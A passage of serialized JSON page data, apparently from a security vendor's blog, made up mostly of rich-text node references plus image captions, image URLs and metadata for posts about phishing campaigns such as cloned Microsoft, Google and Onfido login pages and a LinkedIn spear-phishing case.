"content":78987},{},[78988],{"nodeType":173,"value":8967,"marks":78989,"data":78991},[78990],{"type":370},{},{"nodeType":178,"data":78993,"content":78994},{},[78995],{"nodeType":173,"value":59323,"marks":78996,"data":78997},[],{},{"nodeType":178,"data":78999,"content":79000},{},[79001,79004,79011,79014,79021,79024,79031],{"nodeType":173,"value":59330,"marks":79002,"data":79003},[],{},{"nodeType":186,"data":79005,"content":79006},{"uri":59335},[79007],{"nodeType":173,"value":59338,"marks":79008,"data":79010},[79009],{"type":194},{},{"nodeType":173,"value":2936,"marks":79012,"data":79013},[],{},{"nodeType":186,"data":79015,"content":79016},{"uri":59347},[79017],{"nodeType":173,"value":59350,"marks":79018,"data":79020},[79019],{"type":194},{},{"nodeType":173,"value":59355,"marks":79022,"data":79023},[],{},{"nodeType":186,"data":79025,"content":79026},{"uri":832},[79027],{"nodeType":173,"value":4519,"marks":79028,"data":79030},[79029],{"type":194},{},{"nodeType":173,"value":59366,"marks":79032,"data":79033},[],{},{"nodeType":231,"data":79035,"content":79036},{},[],{"nodeType":169,"data":79038,"content":79039},{},[79040],{"nodeType":173,"value":2824,"marks":79041,"data":79043},[79042],{"type":370},{},{"nodeType":178,"data":79045,"content":79046},{},[79047],{"nodeType":173,"value":59383,"marks":79048,"data":79049},[],{},{"nodeType":250,"data":79051,"content":79052},{},[79053,79072],{"nodeType":254,"data":79054,"content":79055},{},[79056],{"nodeType":178,"data":79057,"content":79058},{},[79059,79062,79069],{"nodeType":173,"value":37,"marks":79060,"data":79061},[],{},{"nodeType":186,"data":79063,"content":79064},{"uri":9120},[79065],{"nodeType":173,"value":59402,"marks":79066,"data":79068},[79067],{"type":194},{},{"nodeType":173,"value":37,"marks":79070,"data":79071},[],{},{"nodeType":254,"data":79073,"content":79074},{},[79075],{"nodeType":178,"data":79076,"content":79077},{},[79078,79081,79088],{"nodeType":173,"value":37,"marks":79079,"data":79080},[],{},{"nodeType":186,"data":79082,"content":79083},{"uri":59420},[79084],{"nodeType":173,"value":59423,"marks":79085,"data":79087},[79086],{"type":194},{},{"nodeType":173,"value":37,"marks":79089,"data":79090},[],{},{"nodeType":178,"data":79092,"content":79093},{},[79094,79097,79101,79104,79111],{"nodeType":173,"value":59434,"marks":79095,"data":79096},[],{},{"nodeType":173,"value":59438,"marks":79098,"data":79100},[79099],{"type":370},{},{"nodeType":173,"value":59443,"marks":79102,"data":79103},[],{},{"nodeType":186,"data":79105,"content":79106},{"uri":6820},[79107],{"nodeType":173,"value":8545,"marks":79108,"data":79110},[79109],{"type":194},{},{"nodeType":173,"value":59454,"marks":79112,"data":79113},[],{},{"nodeType":178,"data":79115,"content":79116},{},[79117],{"nodeType":173,"value":59461,"marks":79118,"data":79119},[],{},{"nodeType":178,"data":79121,"content":79122},{},[79123,79126,79133],{"nodeType":173,"value":59468,"marks":79124,"data":79125},[],{},{"nodeType":186,"data":79127,"content":79128},{"uri":473},[79129],{"nodeType":173,"value":1472,"marks":79130,"data":79132},[79131],{"type":194},{},{"nodeType":173,"value":1477,"marks":79134,"data":79135},[],{},{"items":79137},[79138,79140],{"sys":79139,"name":509},{"id":508},{"sys":79141,"name":505},{"id":504},{"items":79143},[79144],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":79145},{"url":1496},{"__typename":1528,"sys":79147,"content":79148,"title":21090,"synopsis":21091,"hashTags":118,"publishedDate":21092,"slug":21093,"tagsCollection":79645,"authorsCollection":79651},{"id":20516},{"json":79149},{"nodeType":165,"data":79150,"content":79151},{},[79152,79158,79164,79174,79179,79185,79188,79195,79201,79206,79219,79225,79246,79252,79257,79260,79267,79293,79298,79314,79319,79335,79341,79346,79349,79356,79362,79378,79384,79400,79406,79411,79414,79421,79427,79457,79463,79469,79509,79524,79533,79539,79542,79549,79565,79571,79577,79582,79585,79592,79608,79634,79639],{"nodeType":178,"data":79153,"content":79154},{},[79155],{"nodeType":173,"value":20525,"marks":79156,"data":79157},[],{},{"nodeType":178,"data":79159,"content":79160},{},[79161],{"nodeType":173,"value":20532,"marks":79162,"data":79163},[],{},{"nodeType":178,"data":79165,"content":79166},{},[79167,79170],{"nodeType":173,"value":20539,"marks":79168,"data":79169},[],{},{"nodeType":173,"value":20543,"marks":79171,"data":79173},[79172],{"type":370},{},{"nodeType":312,"data":79175,"content":79178},{"target":79176},{"sys":79177},{"id":8032,"type":317,"linkType":318},[],{"nodeType":178,"data":79180,"content":79181},{},[79182],{"nodeType":173,"value":20556,"marks":79183,"data":79184},[],{},{"nodeType":231,"data":79186,"content":79187},{},[],{"nodeType":169,"data":79189,"content":79190},{},[79191],{"nodeType":173,"value":20566,"marks":79192,"data":79194},[79193],{"type":370},{},{"nodeType":178,"data":79196,"content":79197},{},[79198],{"nodeType":173,"value":20574,"marks":79199,"data":79200},[],{},{"nodeType":312,"data":79202,"content":79205},{"target":79203},{"sys":79204},{"id":20581,"type":317,"linkType":318},[],{"nodeType":178,"data":79207,"content":79208},{},[79209,79212,79216],{"nodeType":173,"value":20587,"marks":79210,"data":79211},[],{},{"nodeType":173,"value":20591,"marks":79213,"data":79215},[79214],{"type":370},{},{"nodeType":173,"value":20596,"marks":79217,"data":79218},[],{},{"nodeType":178,"data":79220,"content":79221},{},[79222],{"nodeType":173,"value":20603,"marks":79223,"data":79224},[],{},{"nodeType":250,"data":79226,"content":79227},{},[79228,79237],{"nodeType":254,"data":79229,"content":79230},{},[79231],{"nodeType":178,"data":79232,"content":79233},{},[79234],{"nodeType":173,"value":20616,"marks":79235,"data":79236},[],{},{"nodeType":254,"data":79238,"content":79239},{},[79240],{"nodeType":178,"data":79241,"content":79242},{},[79243],{"nodeType":173,"value":20626,"marks":79244,"data":79245},[],{},{"nodeType":178,"data":79247,"content":79248},{},[79249],{"nodeType":173,"value":20633,"marks":79250,"data":79251},[],{},{"nodeType":312,"data":79253,"content":79256},{"target":79254},{"sys":79255},{"id":20640,"type":317,"linkType":318},[],{"nodeType":231,"data":79258,"content":79259},{},[],{"nodeType":169,"data":79261,"content":79262},{},[79263],{"nodeType":173,"value":20649,"marks":79264,"data":79266},[79265],{"type":370},{},{"nodeType":178,"data":79268,"content":79269},{},[79270,79273,79280,79283,79290],{"nodeType":173,"value":20657,"marks":79271,"data":79272},[],{},{"nodeType":186,"data":79274,"content":79275},{"uri":8043},[79276],{"nodeType":173,"value":20664,"marks":79277,"data":79279},[79278],{"type":194},{},{"nodeType":173,"value":20669,"marks":79281,"data":79282},[],{},{"nodeType":186,"data":79284,"content":79285},{"uri":20674},[79286],{"nodeType":173,"value":20677,"marks":79287,"data":79289},[79288],{"type":194},{},{"nodeType":173,"value":20682,"marks":79291,"data":79292},[],{},{"nodeType":312,"data":79294,"content":79297},{"target":79295},{"sys":79296},{"id":20689,"type":317,"linkType":318},[],{"nodeType":178,"data":79299,"content":79300},{},[79301,79304,79311],{"nodeType":173,"value":20695,"marks":79302,"data":79303},[],{},{"nodeType":186,"data":79305,"content":79306},{"uri":20700},[79307],{"nodeType":173,"value":20703,"marks":79308,"data":79310},[79309],{"type":194},{},{"nodeType":173,"value":197,"marks":79312,"data":79313},[],{},{"nodeType":312,"data":79315,"content":79318},{"target":79316},{"sys":79317},{"id":20714,"type":317,"linkType":318},[],{"nodeType":178,"data":79320,"content":79321},{},[79322,79325,79332],{"nodeType":173,"value":20720,"marks":79323,"data":79324},[],{},{"nodeType":186,"data":79326,"content":79327},{"uri":20725},[79328],{"nodeType":173,"value":8157,"marks":79329,"data":79331},[79330],{"type":194},{},{"nodeType":173,"value":20732,"marks":79333,"data":79334},[],{},{"nodeType":178,"data":79336,"content":79337},{},[79338],{"nodeType":173,"value":20739,"marks":79339,"data":79340},[],{},{"nodeType":312,"data":79342,"content":79345},{"target":79343},{"sys":79344},{"id":20746,"type":317,"linkType":318},[],{"nodeType":231,"data":79347,"content":79348},{},[],{"nodeType":169,"data":79350,"content":79351},{},[79352],{"nodeType":173,"value":20755,"marks":79353,"data":79355},[79354],{"type":370},{},{"nodeType":178,"data":79357,"content":79358},{},[79359],{"nodeType":173,"value":20763,"marks":79360,"data":79361},[],{},{"nodeType":178,"data":79363,"content":79364},{},[79365,79368,79375],{"nodeType":173,"value":20770,"marks":79366,"data":79367},[],{},{"nodeType":186,"data":79369,"content":79370},{"uri":20775},[79371],{"nodeType":173,"value":20778,"marks":79372,"data":79374},[79373],{"type":194},{},{"nodeType":173,"value":20783,"marks":79376,"data":79377},[],{},{"nodeType":178,"data":79379,"content":79380},{},[79381],{"nodeType":173,"value":20790,"marks":79382,"data":79383},[],{},{"nodeType":178,"data":79385,"content":79386},{},[79387,79390,79397],{"nodeType":173,"value":20797,"marks":79388,"data":79389},[],{},{"nodeType":186,"data":79391,"content":79392},{"uri":20802},[79393],{"nodeType":173,"value":20805,"marks":79394,"data":79396},[79395],{"type":194},{},{"nodeType":173,"value":20810,"marks":79398,"data":79399},[],{},{"nodeType":178,"data":79401,"content":79402},{},[79403],{"nodeType":173,"value":20817,"marks":79404,"data":79405},[],{},{"nodeType":312,"data":79407,"content":79410},{"target":79408},{"sys":79409},{"id":20824,"type":317,"linkType":318},[],{"nodeType":231,"data":79412,"content":79413},{},[],{"nodeType":169,"data":79415,"content":79416},{},[79417],{"nodeType":173,"value":20833,"marks":79418,"data":79420},[79419],{"type":370},{},{"nodeType":178,"data":79422,"content":79423},{},[79424],{"nodeType":173,"value":20841,"marks":79425,"data":79426},[],{},{"nodeType":250,"data":79428,"content":79429},{},[79430,79439,79448],{"nodeType":254,"data":79431,"content":79432},{},[79433],{"nodeType":178,"data":79434,"content":79435},{},[79436],{"nodeType":173,"value":20854,"marks":79437,"data":79438},[],{},{"nodeType":254,"data":79440,"content":79441},{},[79442],{"nodeType":178,"data":79443,"content":79444},{},[79445],{"nodeType":173,"value":20864,"marks":79446,"data":79447},[],{},{"nodeType":254,"data":79449,"content":79450},{},[79451],{"nodeType":178,"data":79452,"content":79453},{},[79454],{"nodeType":173,"value":20874,"marks":79455,"data":79456},[],{},{"nodeType":178,"data":79458,"content":79459},{},[79460],{"nodeType":173,"value":20881,"marks":79461,"data":79462},[],{},{"nodeType":178,"data":79464,"content":79465},{},[79466],{"nodeType":173,"value":20888,"marks":79467,"data":79468},[],{},{"nodeType":250,"data":79470,"content":79471},{},[79472,79491,79500],{"nodeType":254,"data":79473,"content":79474},{},[79475],{"nodeType":178,"data":79476,"content":79477},{},[79478,79481,79488],{"nodeType":173,"value":20901,"marks":79479,"data":79480},[],{},{"nodeType":186,"data":79482,"content":79483},{"uri":20906},[79484],{"nodeType":173,"value":20909,"marks":79485,"data":79487},[79486],{"type":194},{},{"nodeType":173,"value":20914,"marks":79489,"data":79490},[],{},{"nodeType":254,"data":79492,"content":79493},{},[79494],{"nodeType":178,"data":79495,"content":79496},{},[79497],{"nodeType":173,"value":20924,"marks":79498,"data":79499},[],{},{"nodeType":254,"data":79501,"content":79502},{},[79503],{"nodeType":178,"data":79504,"content":79505},{},[79506],{"nodeType":173,"value":20934,"marks":79507,"data":79508},[],{},{"nodeType":178,"data":79510,"content":79511},{},[79512,79515,79521],{"nodeType":173,"value":20941,"marks":79513,"data":79514},[],{},{"nodeType":186,"data":79516,"content":79517},{"uri":1252},[79518],{"nodeType":173,"value":20948,"marks":79519,"data":79520},[],{},{"nodeType":173,"value":20952,"marks":79522,"data":79523},[],{},{"nodeType":3769,"data":79525,"content":79526},{},[79527],{"nodeType":178,"data":79528,"content":79529},{},[79530],{"nodeType":173,"value":20962,"marks":79531,"data":79532},[],{},{"nodeType":178,"data":79534,"content":79535},{},[79536],{"nodeType":173,"value":20969,"marks":79537,"data":79538},[],{},{"nodeType":231,"data":79540,"content":79541},{},[],{"nodeType":169,"data":79543,"content":79544},{},[79545],{"nodeType":173,"value":20979,"marks":79546,"data":79548},[79547],{"type":370},{},{"nodeType":178,"data":79550,"content":79551},{},[79552,79555,79562],{"nodeType":173,"value":20987,"marks":79553,"data":79554},[],{},{"nodeType":186,"data":79556,"content":79557},{"uri":20992},[79558],{"nodeType":173,"value":20995,"marks":79559,"data":79561},[79560],{"type":194},{},{"nodeType":173,"value":21000,"marks":79563,"data":79564},[],{},{"nodeType":178,"data":79566,"content":79567},{},[79568],{"nodeType":173,"value":21007,"marks":79569,"data":79570},[],{},{"nodeType":178,"data":79572,"content":79573},{},[79574],{"nodeType":173,"value":21014,"marks":79575,"data":79576},[],{},{"nodeType":312,"data":79578,"content":79581},{"target":79579},{"sys":79580},{"id":21021,"type":317,"linkType":318},[],{"nodeType":231,"data":79583,"content":79584},{},[],{"nodeType":169,"data":79586,"content":79587},{},[79588],{"nodeType":173,"value":18605,"marks":79589,"data":79591},[79590],{"type":370},{},{"nodeType":178,"data":79593,"content":79594},{},[79595,79598,79605],{"nodeType":173,"value":21037,"marks":79596,"data":79597},[],{},{"nodeType":186,"data":79599,"content":79600},{"uri":21042},[79601],{"nodeType":173,"value":21045,"marks":79602,"data":79604},[79603],{"type":194},{},{"nodeType":173,"value":21050,"marks":79606,"data":79607},[],{},{"nodeType":178,"data":79609,"content":79610},{},[79611,79614,79621,79624,79631],{"nodeType":173,"value":1451,"marks":79612,"data":79613},[],{},{"nodeType":186,"data":79615,"content":79616},{"uri":1456},[79617],{"nodeType":173,"value":1459,"marks":79618,"data":79620},[79619],{"type":194},{},{"nodeType":173,"value":1464,"marks":79622,"data":79623},[],{},{"nodeType":186,"data":79625,"content":79626},{"uri":1469},[79627],{"nodeType":173,"value":1472,"marks":79628,"data":79630},[79629],{"type":194},{},{"nodeType":173,"value":1477,"marks":79632,"data":79633},[],{},{"nodeType":312,"data":79635,"content":79638},{"target":79636},{"sys":79637},{"id":20640,"type":317,"linkType":318},[],{"nodeType":178,"data":79640,"content":79641},{},[79642],{"nodeType":173,"value":37,"marks":79643,"data":79644},[],{},{"items":79646},[79647,79649],{"sys":79648,"name":509},{"id":508},{"sys":79650,"name":505},{"id":504},{"items":79652},[79653],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":79654},{"url":1496},{"items":79656},[79657],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":79658},{"url":1496},{"json":79660,"links":80132},{"data":79661,"content":79662,"nodeType":165},{},[79663,79670,79676,79682,79688,79693,79696,79703,79709,79715,79728,79764,79769,79775,79788,79794,79799,79802,79809,79815,79828,79844,79860,79876,79882,79885,79892,79908,79934,79939,79944,79947,79954,79970,79986,79992,80008,80013,80018,80021,80028,80034,80040,80066,80072,80075,80082,80088,80094,80100,80106],{"data":79664,"content":79665,"nodeType":169},{},[79666],{"data":79667,"marks":79668,"value":62796,"nodeType":173},{},[79669],{"type":370},{"data":79671,"content":79672,"nodeType":178},{},[79673],{"data":79674,"marks":79675,"value":62803,"nodeType":173},{},[],{"data":79677,"content":79678,"nodeType":178},{},[79679],{"data":79680,"marks":79681,"value":62810,"nodeType":173},{},[],{"data":79683,"content":79684,"nodeType":178},{},[79685],{"data":79686,"marks":79687,"value":62817,"nodeType":173},{},[],{"data":79689,"content":79692,"nodeType":312},{"target":79690},{"sys":79691},{"id":62822,"type":317,"linkType":318},[],{"data":79694,"content":79695,"nodeType":231},{},[],{"data":79697,"content":79698,"nodeType":169},{},[79699],{"data":79700,"marks":79701,"value":62834,"nodeType":173},{},[79702],{"type":370},{"data":79704,"content":79705,"nodeType":178},{},[79706],{"data":79707,"marks":79708,"value":62841,"nodeType":173},{},[],{"data":79710,"content":79711,"nodeType":178},{},[79712],{"data":79713,"marks":79714,"value":62848,"nodeType":173},{},[],{"data":79716,"content":79717,"nodeType":178},{},[79718,79721,79725],{"data":79719,"marks":79720,"value":62855,"nodeType":173},{},[],{"data":79722,"marks":79723,"value":62860,"nodeType":173},{},[79724],{"type":1646},{"data":79726,"marks":79727,"value":62864,"nodeType":173},{},[],{"data":79729,"content":79730,"nodeType":178},{},[79731,79734,79741,79744,79751,79754,79761],{"data":79732,"marks":79733,"value":62871,"nodeType":173},{},[],{"data":79735,"content":79736,"nodeType":186},{"uri":62874},[79737],{"data":79738,"marks":79739,"value":62880,"nodeType":173},{},[79740],{"type":194},{"data":79742,"marks":79743,"value":2936,"nodeType":173},{},[],{"data":79745,"content":79746,"nodeType":186},{"uri":50125},[79747],{"data":79748,"marks":79749,"value":58281,"nodeType":173},{},[79750],{"type":194},{"data":79752,"marks":79753,"value":9534,"nodeType":173},{},[],{"data":79755,"content":79756,"nodeType":186},{"uri":62896},[79757],{"data":79758,"marks":79759,"value":62902,"nodeType":173},{},[79760],{"type":194},{"data":79762,"marks":79763,"value":62906,"nodeType":173},{},[],{"data":79765,"content":79768,"nodeType":312},{"target":79766},{"sys":79767},{"id":62911,"type":317,"linkType":318},[],{"data":79770,"content":79771,"nodeType":178},{},[79772],{"data":79773,"marks":79774,"value":62919,"nodeType":173},{},[],{"data":79776,"content":79777,"nodeType":178},{},[79778,79781,79785],{"data":79779,"marks":79780,"value":62926,"nodeType":173},{},[],{"data":79782,"marks":79783,"value":62931,"nodeType":173},{},[79784],{"type":1646},{"data":79786,"marks":79787,"value":62935,"nodeType":173},{},[],{"data":79789,"content":79790,"nodeType":178},{},[79791],{"data":79792,"marks":79793,"value":62942,"nodeType":173},{},[],{"data":79795,"content":79798,"nodeType":312},{"target":79796},{"sys":79797},{"id":60266,"type":317,"linkType":318},[],{"data":79800,"content":79801,"nodeType":231},{},[],{"data":79803,"content":79804,"nodeType":169},{},[79805],{"data":79806,"marks":79807,"value":62958,"nodeType":173},{},[79808],{"type":370},{"data":79810,"content":79811,"nodeType":178},{},[79812],{"data":79813,"marks":79814,"value":62965,"nodeType":173},{},[],{"data":79816,"content":79817,"nodeType":178},{},[79818,79821,79825],{"data":79819,"marks":79820,"value":62972,"nodeType":173},{},[],{"data":79822,"marks":79823,"value":62977,"nodeType":173},{},[79824],{"type":370},{"data":79826,"marks":79827,"value":62981,"nodeType":173},{},[],{"data":79829,"content":79830,"nodeType":178},{},[79831,79834,79841],{"data":79832,"marks":79833,"value":62988,"nodeType":173},{},[],{"data":79835,"content":79836,"nodeType":186},{"uri":62991},[79837],{"data":79838,"marks":79839,"value":62997,"nodeType":173},{},[79840],{"type":194},{"data":79842,"marks":79843,"value":63001,"nodeType":173},{},[],{"data":79845,"content":79846,"nodeType":178},{},[79847,79850,79857],{"data":79848,"marks":79849,"value":63008,"nodeType":173},{},[],{"data":79851,"content":79852,"nodeType":186},{"uri":7853},[79853],{"data":79854,"marks":79855,"value":7856,"nodeType":173},{},[79856],{"type":194},{"data":79858,"marks":79859,"value":63019,"nodeType":173},{},[],{"data":79861,"content":79862,"nodeType":178},{},[79863,79866,79873],{"data":79864,"marks":79865,"value":63026,"nodeType":173},{},[],{"data":79867,"content":79868,"nodeType":186},{"uri":63029},[79869],{"data":79870,"marks":79871,"value":63035,"nodeType":173},{},[79872],{"type":194},{"data":79874,"marks":79875,"value":63039,"nodeType":173},{},[],{"data":79877,"content":79878,"nodeType":178},{},[79879],{"data":79880,"marks":79881,"value":63046,"nodeType":173},{},[],{"data":79883,"content":79884,"nodeType":231},{},[],{"data":79886,"content":79887,"nodeType":169},{},[79888],{"data":79889,"marks":79890,"value":63057,"nodeType":173},{},[79891],{"type":370},{"data":79893,"content":79894,"nodeType":178},{},[79895,79898,79905],{"data":79896,"marks":79897,"value":37,"nodeType":173},{},[],{"data":79899,"content":79900,"nodeType":186},{"uri":1764},[79901],{"data":79902,"marks":79903,"value":63071,"nodeType":173},{},[79904],{"type":194},{"data":79906,"marks":79907,"value":63075,"nodeType":173},{},[],{"data":79909,"content":79910,"nodeType":178},{},[79911,79914,79921,79924,79931],{"data":79912,"marks":79913,"value":63082,"nodeType":173},{},[],{"data":79915,"content":79916,"nodeType":186},{"uri":58235},[79917],{"data":79918,"marks":79919,"value":63090,"nodeType":173},{},[79920],{"type":194},{"data":79922,"marks":79923,"value":63094,"nodeType":173},{},[],{"data":79925,"content":79926,"nodeType":186},{"uri":63097},[79927],{"data":79928,"marks":79929,"value":13298,"nodeType":173},{},[79930],{"type":194},{"data":79932,"marks":79933,"value":63106,"nodeType":173},{},[],{"data":79935,"content":79938,"nodeType":312},{"target":79936},{"sys":79937},{"id":59019,"type":317,"linkType":318},[],{"data":79940,"content":79943,"nodeType":312},{"target":79941},{"sys":79942},{"id":59074,"type":317,"linkType":318},[],{"data":79945,"content":79946,"nodeType":231},{},[],{"data":79948,"content":79949,"nodeType":169},{},[79950],{"data":79951,"marks":79952,"value":63127,"nodeType":173},{},[79953],{"type":370},{"data":79955,"content":79956,"nodeType":178},{},[79957,79960,79967],{"data":79958,"marks":79959,"value":37,"nodeType":173},{},[],{"data":79961,"content":79962,"nodeType":186},{"uri":14287},[79963],{"data":79964,"marks":79965,"value":63141,"nodeType":173},{},[79966],{"type":194},{"data":79968,"marks":79969,"value":63145,"nodeType":173},{},[],{"data":79971,"content":79972,"nodeType":178},{},[79973,79976,79983],{"data":79974,"marks":79975,"value":63152,"nodeType":173},{},[],{"data":79977,"content":79978,"nodeType":186},{"uri":63155},[79979],{"data":79980,"marks":79981,"value":63161,"nodeType":173},{},[79982],{"type":194},{"data":79984,"marks":79985,"value":63165,"nodeType":173},{},[],{"data":79987,"content":79988,"nodeType":178},{},[79989],{"data":79990,"marks":79991,"value":63172,"nodeType":173},{},[],{"data":79993,"content":79994,"nodeType":178},{},[79995,79998,80005],{"data":79996,"marks":79997,"value":63179,"nodeType":173},{},[],{"data":79999,"content":80000,"nodeType":186},{"uri":63182},[80001],{"data":80002,"marks":80003,"value":25071,"nodeType":173},{},[80004],{"type":194},{"data":80006,"marks":80007,"value":63191,"nodeType":173},{},[],{"data":80009,"content":80012,"nodeType":312},{"target":80010},{"sys":80011},{"id":63196,"type":317,"linkType":318},[],{"data":80014,"content":80017,"nodeType":312},{"target":80015},{"sys":80016},{"id":63202,"type":317,"linkType":318},[],{"data":80019,"content":80020,"nodeType":231},{},[],{"data":80022,"content":80023,"nodeType":169},{},[80024],{"data":80025,"marks":80026,"value":63214,"nodeType":173},{},[80027],{"type":370},{"data":80029,"content":80030,"nodeType":178},{},[80031],{"data":80032,"marks":80033,"value":63221,"nodeType":173},{},[],{"data":80035,"content":80036,"nodeType":178},{},[80037],{"data":80038,"marks":80039,"value":63228,"nodeType":173},{},[],{"data":80041,"content":80042,"nodeType":178},{},[80043,80046,80053,80056,80063],{"data":80044,"marks":80045,"value":63235,"nodeType":173},{},[],{"data":80047,"content":80048,"nodeType":186},{"uri":730},[80049],{"data":80050,"marks":80051,"value":63243,"nodeType":173},{},[80052],{"type":194},{"data":80054,"marks":80055,"value":63247,"nodeType":173},{},[],{"data":80057,"content":80058,"nodeType":186},{"uri":63250},[80059],{"data":80060,"marks":80061,"value":63256,"nodeType":173},{},[80062],{"type":194},{"data":80064,"marks":80065,"value":63260,"nodeType":173},{},[],{"data":80067,"content":80068,"nodeType":178},{},[80069],{"data":80070,"marks":80071,"value":63267,"nodeType":173},{},[],{"data":80073,"content":80074,"nodeType":231},{},[],{"data":80076,"content":80077,"nodeType":169},{},[80078],{"data":80079,"marks":80080,"value":63278,"nodeType":173},{},[80081],{"type":370},{"data":80083,"content":80084,"nodeType":178},{},[80085],{"data":80086,"marks":80087,"value":63285,"nodeType":173},{},[],{"data":80089,"content":80090,"nodeType":178},{},[80091],{"data":80092,"marks":80093,"value":63292,"nodeType":173},{},[],{"data":80095,"content":80096,"nodeType":178},{},[80097],{"data":80098,"marks":80099,"value":63299,"nodeType":173},{},[],{"data":80101,"content":80102,"nodeType":178},{},[80103],{"data":80104,"marks":80105,"value":63306,"nodeType":173},{},[],{"data":80107,"content":80108,"nodeType":178},{},[80109,80112,80119,80122,80129],{"data":80110,"marks":80111,"value":1451,"nodeType":173},{},[],{"data":80113,"content":80114,"nodeType":186},{"uri":1456},[80115],{"data":80116,"marks":80117,"value":1459,"nodeType":173},{},[80118],{"type":194},{"data":80120,"marks":80121,"value":1464,"nodeType":173},{},[],{"data":80123,"content":80124,"nodeType":186},{"uri":1469},[80125],{"data":80126,"marks":80127,"value":1472,"nodeType":173},{},[80128],{"type":194},{"data":80130,"marks":80131,"value":1477,"nodeType":173},{},[],{"entries":80133},{"hyperlink":80134,"inline":80135,"block":80136},[],[],[80137,80143,80150,80154,80161,80166,80174],{"sys":80138,"__typename":5345,"title":80139,"caption":80139,"layoutMode":118,"file":80140},{"id":62822},"Phishing is now delivered over multiple channels, not just email, targeting a wide range of cloud and SaaS apps.",{"url":80141,"width":5358,"height":80142},"https://images.ctfassets.net/y1cdw1ablpvd/1Fq4iSo4ssD0bdINZ4M31q/28d89ce5b8af767b37d2acb54a1c78cf/2.png",1003,{"sys":80144,"__typename":5345,"title":80145,"caption":80145,"layoutMode":118,"file":80146},{"id":62911},"What a web proxy sees when analyzing a network request for a modern phishing page — this is meant to show you that a fake Microsoft login page was rendered.",{"url":80147,"width":80148,"height":80149},"https://images.ctfassets.net/y1cdw1ablpvd/1dqlvz1plkQ78fSfXkQPoC/ddbc9ddec94672f10a33e483b11f0da4/2.png",1776,1780,{"sys":80151,"__typename":15269,"type":15270,"ctaText":80152,"buttonLabel":80153,"buttonColour":15273,"buttonUrl":70840},{"id":60266},"Learn more about how phishing attacks have evolved and why they're so effective at evading detection controls.","Get the Whitepaper",{"sys":80155,"__typename":5345,"title":80156,"caption":80156,"layoutMode":118,"file":80157},{"id":59019},"Google Sites page styled to look like a private equity fund opportunity.",{"url":80158,"width":80159,"height":80160},"https://images.ctfassets.net/y1cdw1ablpvd/1HGAL4CypIZ0BRlUT3jn74/b9f6144ee6d3c4b93868ff0b3236a3e8/Group_555.png",3444,2066,{"sys":80162,"__typename":5345,"title":80163,"caption":80163,"layoutMode":118,"file":80164},{"id":59074},"The AitM phishing page presented as a standard Google login page.",{"url":80165,"width":5358,"height":11942},"https://images.ctfassets.net/y1cdw1ablpvd/5SgufpH8y8W1GunlFzkVDp/68d702ffb904b2e5732b8fecfdda3b37/image5.png",{"sys":80167,"__typename":5345,"title":80168,"caption":80169,"layoutMode":118,"file":80170},{"id":63196},"Onfido malicious google ad","Malicious Google ad mimicking the Onfido login page link.",{"url":80171,"width":80172,"height":80173},"https://images.ctfassets.net/y1cdw1ablpvd/6Wo4Dnaftaq4kNp7z2Jlkb/9db5606b545d29e5f603ebf86e68756a/image7.png",877,536,{"sys":80175,"__typename":5345,"title":80176,"caption":80176,"layoutMode":118,"file":80177},{"id":63202},"Malicious cloned login page impersonating Onfido.",{"url":80178,"width":5358,"height":80179},"https://images.ctfassets.net/y1cdw1ablpvd/2mAuRHATA7n4sIEZd5pM1N/2e53a5d5a43c3bc72741c2c69445efe0/6.png",1089,"content:blog:why-attackers-are-moving-beyond-email-based-phishing.json","blog/why-attackers-are-moving-beyond-email-based-phishing.json","blog/why-attackers-are-moving-beyond-email-based-phishing",{"_path":80184,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":80185,"ogImage":118,"summary":80187,"title":46288,"subtitle":118,"metaTitle":80197,"synopsis":59481,"hashTags":118,"publishedDate":59482,"slug":46289,"tagsCollection":80198,"relatedBlogPostsCollection":80204,"authorsCollection":82285,"content":82289,"_id":82809,"_type":5439,"_source":5440,"_file":82810,"_stem":82811,"_extension":5439},"/blog/how-push-stopped-a-high-risk-linkedin-spear-phishing-attack",{"id":24168,"publishedAt":80186},"2025-11-17T15:27:01.915Z",{"json":80188},{"data":80189,"content":80190,"nodeType":165},{},[80191],{"data":80192,"content":80193,"nodeType":178},{},[80194],{"data":80195,"marks":80196,"value":59481,"nodeType":173},{},[],"How Push stopped a high risk LinkedIn spear-phishing attack",{"items":80199},[80200,80202],{"sys":80201,"name":509},{"id":508},{"sys":80203,"name":505},{"id":504},{"items":80205},[80206,80771,81293],{"__typename":1528,"sys":80207,"content":80208,"title":60690,"synopsis":60691,"hashTags":118,"publishedDate":60692,"slug":60693,"tagsCollection":80761,"authorsCollection":80767},{"id":60053},{"json":80209},{"data":80210,"content":80211,"nodeType":165},{},[80212,80225,80231,80234,80241,80247,80253,80269,80274,80280,80286,80292,80298,80301,80308,80314,80319,80325,80332,80338,80344,80349,80365,80370,80376,80382,80388,80393,80396,80403,80419,80425,80451,80457,80463,80468,80474,80480,80486,80489,80496,80511,80516,80522,80528,80533,80539,80545,80548,80555,80561,80577,80613,80619,80625,80631,80634,80641,80647,80653,80659,80662,80669,80675,80701,80717,80723,80726,80733,80739,80745],{"data":80213,"content":80214,"nodeType":178},{},[80215,80218,80222],{"data":80216,"marks":80217,"value":60064,"nodeType":173},{},[],{"data":80219,"marks":80220,"value":60069,"nodeType":173},{},[80221],{"type":1646},{"data":80223,"marks":80224,"value":60073,"nodeType":173},{},[],{"data":80226,"content":80227,"nodeType":178},{},[80228],{"data":80229,"marks":80230,"value":60080,"nodeType":173},{},[],{"data":80232,"content":80233,"nodeType":231},{},[],{"data":80235,"content":80236,"nodeType":169},{},[80237],{"data":80238,"marks":80239,"value":60091,"nodeType":173},{},[80240],{"type":370},{"data":80242,"content":80243,"nodeType":178},{},[80244],{"data":80245,"marks":80246,"value":60098,"nodeType":173},{},[],{"data":80248,"content":80249,"nodeType":178},{},[80250],{"data":80251,"marks":80252,"value":60105,"nodeType":173},{},[],{"data":80254,"content":80255,"nodeType":178},{},[80256,80259,80266],{"data":80257,"marks":80258,"value":60112,"nodeType":173},{},[],{"data":80260,"content":80261,"nodeType":186},{"uri":60115},[80262],{"data":80263,"marks":80264,"value":27706,"nodeType":173},{},[80265],{"type":194},{"data":80267,"marks":80268,"value":60124,"nodeType":173},{},[],{"data":80270,"content":80273,"nodeType":312},{"target":80271},{"sys":80272},{"id":60129,"type":317,"linkType":318},[],{"data":80275,"content":80276,"nodeType":178},{},[80277],{"data":80278,"marks":80279,"value":60137,"